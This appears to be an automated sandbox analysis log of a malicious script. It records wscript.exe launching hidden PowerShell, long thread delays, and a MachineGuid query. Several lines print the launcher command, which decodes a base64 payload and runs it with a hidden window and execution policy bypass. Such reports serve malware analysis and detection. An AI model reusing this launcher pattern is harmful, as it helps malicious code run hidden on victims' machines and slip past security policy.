Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD if ($_.FullyQualifiedErrorId -ne "NativeCommandErro
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4052
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1565
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 390
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684 Thread sleep count: 390 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688 Thread sleep count: 552 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
No contacted IP information